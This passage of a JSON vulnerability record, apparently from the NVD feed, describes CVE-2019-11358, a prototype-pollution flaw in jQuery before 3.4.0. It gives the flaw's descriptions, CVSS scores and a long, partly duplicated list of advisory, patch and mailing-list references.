"matchCriteriaId": "216E7DDE-453D-481F-92E2-9F8466CDDA3F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype."
},
{
"lang": "es",
"value": "jQuery, en versiones anteriores a 3.4.0, como es usado en Drupal, Backdrop CMS, y otros productos, maneja mal jQuery.extend(true, {}, ...) debido a la contaminaci\u00f3n de Object.prototype. Si un objeto fuente no sanitizado conten\u00eda una propiedad enumerable __proto__, podr\u00eda extender el Object.prototype nativo."
}
],
"id": "CVE-2019-11358",
"lastModified": "2024-11-21T04:20:56.320",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-04-20T00:29:00.247",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/11"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/13"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2019/06/03/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108023"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1456"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2587"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3023"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3024"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://backdropcms.org/security/backdrop-sa-core-2019-009"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jquery/jquery/pull/4333"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Apr/32"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Jun/12"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/May/18"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190919-0001/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4434"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4460"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.drupal.org/sa-core-2019-006"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.synology.com/security/advisory/Synology_SA_19_19"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.tenable.com/security/tns-2019-08"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.tenable.com/security/tns-2020-02"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/May/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2019/06/03/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108023"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1456"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2587"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3023"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3024"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://backdropcms.org/security/backdrop-sa-core-2019-009"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jquery/jquery/pull/4333"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Apr/32"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Jun/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/May/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190919-0001/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4434"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.drupal.org/sa-core-2019-006"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
